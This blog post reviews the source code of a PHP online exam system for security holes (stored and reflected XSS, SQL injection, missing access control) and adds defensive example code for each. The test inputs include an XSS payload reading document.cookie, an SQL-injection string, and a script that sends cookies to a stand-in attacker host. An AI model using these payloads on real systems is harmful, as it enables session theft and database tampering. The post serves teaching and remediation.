ninja at @prismacsi- human rights activist

Source Code Analysis 101

Before Start

I hope the covid19 pandemic ends as soon as possible, everywhere. Anyway: during a penetration test, the pentester tries to understand how the web application works. I think this is the most important rule, because a pentester who understands the application can find its vulnerabilities. So if the tested application is open source, everything becomes easier.

Online Exam System

This system was recently used by my university. Do not be afraid! I only got 50 on the exam. We need to be ethical.

Vendor Homepage:

Software Link:

I cloned the application locally, and we can start!

In the picture above we see that the web app has a registration form for students. We can start our analysis here.

The web app takes the user information in index.php and sends it via POST to signin.php. I open signin.php.

The content of signin.php is as in the picture above. Before we look for vulnerabilities, let's look at some of the functions the developer uses.

ucwords = uppercases the first character of each word in a string.

strtolower = converts every character of a string to lower case.

stripslashes = removes backslashes from a string (the inverse of addslashes).

addslashes = puts a backslash in front of single quote, double quote, backslash and NUL, the characters that need quoting in database queries.

None of these functions touches <, > or =, so they are no solution for stored XSS: a payload saved through the registration form is rendered later exactly as it was submitted. This is the first vulnerability we found. Then we will see how the admin's cookie can be hijacked with it.
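As an added example (not code from the application), the following runs the same four-function chain on a constructed XSS payload and shows what it leaves intact, next to the output encoding that actually neutralises it. The function names signin_filter, render_unsafe and render_safe are mine.

```php
<?php
// Added example, not the Online Exam System's code. Applies the same
// four calls signin.php uses to a constructed XSS payload and compares
// rendering it raw with rendering it through output encoding.

// The filter chain from the page, in the order the developer applies it
// (function name is mine).
function signin_filter(string $value): string
{
    return addslashes(stripslashes(ucwords(strtolower($value))));
}

// What a template does when it trusts the stored value (name is mine).
function render_unsafe(string $name): string
{
    return '<td>' . $name . '</td>';
}

// Output encoding: <, >, &, " and ' become entities, so the value can
// never open a tag or an attribute, whatever was stored (name is mine).
function render_safe(string $name): string
{
    return '<td>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed sample input: no quotes or backslashes, so addslashes()
// and stripslashes() have nothing to act on, and only lowercase
// JavaScript identifiers, because strtolower()/ucwords() mangle the
// case of anything else. HTML tag and attribute names are
// case-insensitive, so the tag itself survives the case changes.
$payload = '<img src=x onerror=alert(document.cookie)>';
$stored  = signin_filter($payload);

echo "stored:  $stored\n";
echo "unsafe:  ", render_unsafe($stored), "\n";
echo "encoded: ", render_safe($stored), "\n";
```

Run it with the PHP CLI: the stored value differs from the payload only in the capitalisation of the attribute names, the unsafe rendering is still a working img tag with an onerror handler, and the encoded rendering is inert text. The case mangling is worth noting for payload writing: JavaScript is case-sensitive, so anything with mixed-case identifiers would be broken by this chain, while tags and attributes are not.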

After all these filters, the variables are inserted with the INSERT INTO below:

$q3=mysqli_query($con,"INSERT INTO user VALUES  ('$name' , '$gender' , '$college','$email' ,'$mob', '$password')");

In some MySQL configurations the backslash is not an escape character at all (sql_mode NO_BACKSLASH_ESCAPES), and addslashes() is not aware of the connection character set either, unlike mysqli_real_escape_string(). The values are concatenated straight into the query, so we can say this code is affected by SQL injection. BUT!

I do not recommend exploiting the SQLi here. Because the query is an INSERT INTO, every injected payload writes rows into the database, which can put real stress on it.
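As an added example (not code from the application), here is the registration INSERT rebuilt with a prepared statement, beside the addslashes-and-concatenate pattern the page shows. It runs against an in-memory SQLite database through PDO so no MySQL server is needed; the pdo_sqlite extension, the column names (taken from the VALUES order) and the function names are my assumptions. With mysqli the same fix is mysqli_prepare() / bind_param() / execute().

```php
<?php
// Added example, not the Online Exam System's code. Rebuilds the
// registration INSERT with a prepared statement and puts it beside the
// page's addslashes()-and-concatenate pattern. Runs against an in-memory
// SQLite database through PDO (assumes the pdo_sqlite extension) so no
// MySQL server is needed; with mysqli the equivalent is
// mysqli_prepare() / bind_param() / execute().

// The page's pattern: addslashes() on every field, then string-building.
// Returns the SQL text so the escaping can be inspected (name is mine).
function vulnerable_query(array $f): string
{
    $f = array_map('addslashes', $f);
    return "INSERT INTO user VALUES ('{$f['name']}', '{$f['gender']}', '{$f['college']}', "
         . "'{$f['email']}', '{$f['mob']}', '{$f['password']}')";
}

// The fix: placeholders. The values never become part of the SQL text,
// so neither sql_mode nor the connection charset can turn them into
// syntax (name is mine; column names are assumed from the VALUES order).
function safe_insert(PDO $db, array $f): void
{
    $stmt = $db->prepare(
        'INSERT INTO user (name, gender, college, email, mob, password) VALUES (?, ?, ?, ?, ?, ?)'
    );
    $stmt->execute([$f['name'], $f['gender'], $f['college'], $f['email'], $f['mob'], $f['password']]);
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE user (name TEXT, gender TEXT, college TEXT, email TEXT, mob TEXT, password TEXT)');

// Constructed sample input: a quote in the name, as a real "O'Brien" has,
// followed by an injection attempt that closes the VALUES list early.
$samples = [
    ['name' => "O'Brien", 'gender' => 'm', 'college' => 'Example College',
     'email' => 'ob@example.invalid', 'mob' => '5550100', 'password' => 'secret'],
    ['name' => "x', 'm', 'c', 'e', '0', 'p'); -- ", 'gender' => 'm', 'college' => 'c',
     'email' => 'e', 'mob' => '0', 'password' => 'p'],
];

foreach ($samples as $fields) {
    // With concatenation the quote is only neutralised where the server
    // treats \ as an escape; under MySQL's NO_BACKSLASH_ESCAPES (and in
    // SQLite) the backslash is an ordinary character and the quote still
    // terminates the string literal.
    echo "built SQL: ", vulnerable_query($fields), "\n";
    safe_insert($db, $fields);
}

// With placeholders both names are stored exactly as submitted: the
// injection string is just a name, and the table holds exactly two rows.
foreach ($db->query('SELECT name FROM user') as $row) {
    echo "stored name: {$row['name']}\n";
}
```

The printed SQL text is where to look: the escaped quote in the first sample is only safe as long as the server agrees that a backslash escapes it, which is a server setting, not something the PHP code controls. The same placeholder pattern applies to every query in the application that takes a request parameter, SELECTs included.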

We registered on the web app and will now review the user panel.

Let's start by analysing the account.php file. There is a reflected XSS here:

 <!--alert message-->
<?php if(@$_GET['w'])
<!--alert message end-->

sometimes it’s so hard to understand the developer :(
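The page shows that account.php's alert block is keyed on @$_GET['w'] but not what it echoes, so this added example (not the application's code) assumes w selects the message to show. Instead of reflecting the parameter, it maps w to a fixed message from an allowlist and still encodes on output; the function names and the message table are mine.

```php
<?php
// Added example, not the Online Exam System's code. account.php keys its
// alert block on @$_GET['w']; what it echoes is not visible on the page,
// so this assumes w selects the message. The parameter is never
// reflected: it only picks an entry from a fixed table, and the output
// is encoded anyway. Function names and the table are mine.

// Allowlist: only these codes produce text; anything else falls back
// to a generic message. Attacker-supplied text never reaches the page.
const ALERT_MESSAGES = [
    '1' => 'Wrong username or password.',
    '2' => 'Your details were updated.',
    '3' => 'Exam already submitted.',
];

// Pure function over the query array so it can be exercised from the CLI.
function alert_message(array $get): ?string
{
    if (!isset($get['w'])) {            // no @: test for presence explicitly
        return null;
    }
    // ?w[]=x arrives as an array; treat anything but a string as unknown.
    if (!is_string($get['w'])) {
        return 'Unknown message.';
    }
    return ALERT_MESSAGES[$get['w']] ?? 'Unknown message.';
}

// The only place the value meets HTML; encoded even though it is fixed text.
function alert_html(array $get): string
{
    $msg = alert_message($get);
    if ($msg === null) {
        return '';
    }
    return '<div class="alert">' . htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</div>';
}

// Constructed sample requests: a legitimate code, a reflected-XSS attempt,
// an array-typed parameter and no parameter at all.
$requests = [
    ['w' => '1'],
    ['w' => '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'],
    ['w' => ['x']],
    [],
];
foreach ($requests as $get) {
    echo var_export($get, true), ' => ', var_export(alert_html($get), true), "\n";
}
```

The @ in the original silences the undefined-index notice rather than handling the missing case; an explicit isset() does the same job without hiding other warnings, and the is_string() check covers the array-typed parameter that PHP will happily build from ?w[]=x.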

When starting an exam, the eid parameter is vulnerable to UNION-based SQL injection.

I want to analyse the dash.php file.

The developer does not check who the user is: every user can view dash.php. Can we call this vulnerability IDOR (insecure direct object reference)? Strictly it is missing function-level access control, but it is commonly reported as IDOR.
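As an added example (not the application's code), this is the gate dash.php would need at its top, written as a pure function over the session array so it can be exercised from the CLI. The session keys user_id and role, the role name admin and the function names are my assumptions; the application's real ones are not on the page.

```php
<?php
// Added example, not the Online Exam System's code. dash.php performs no
// user check; this is the gate such a page needs before any output. The
// session keys ('user_id', 'role') and the role name 'admin' are
// assumptions, as are the function names.

// Decide from the session alone. Returns null when access is allowed,
// otherwise the reason, so the caller can pick the right response.
function access_denied_reason(array $session, string $required_role): ?string
{
    if (empty($session['user_id'])) {
        return 'not logged in';
    }
    // The role comes from the server-side session, set at login from the
    // database; never from a request parameter or a cookie the client set.
    if (($session['role'] ?? null) !== $required_role) {
        return 'insufficient role';
    }
    return null;
}

// What the top of dash.php would call before emitting anything.
function require_role(string $required_role): void
{
    session_start();
    $reason = access_denied_reason($_SESSION, $required_role);
    if ($reason === 'not logged in') {
        header('Location: index.php');
        exit;
    }
    if ($reason !== null) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Constructed sessions: anonymous visitor, ordinary student, admin.
$cases = [
    'anonymous' => [],
    'student'   => ['user_id' => 7, 'role' => 'student'],
    'admin'     => ['user_id' => 1, 'role' => 'admin'],
];
foreach ($cases as $label => $session) {
    $reason = access_denied_reason($session, 'admin');
    printf("%-9s => %s\n", $label, $reason ?? 'allowed');
}
```

Two separate outcomes matter: an anonymous visitor is redirected to the login page, while a logged-in student gets a 403, so the check distinguishes authentication from authorization instead of treating "has a session" as "may see the dashboard".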

We started with a basic web application. This is the first post of the series. Thank you for reading.

Follow me on Twitter: @berkdusunur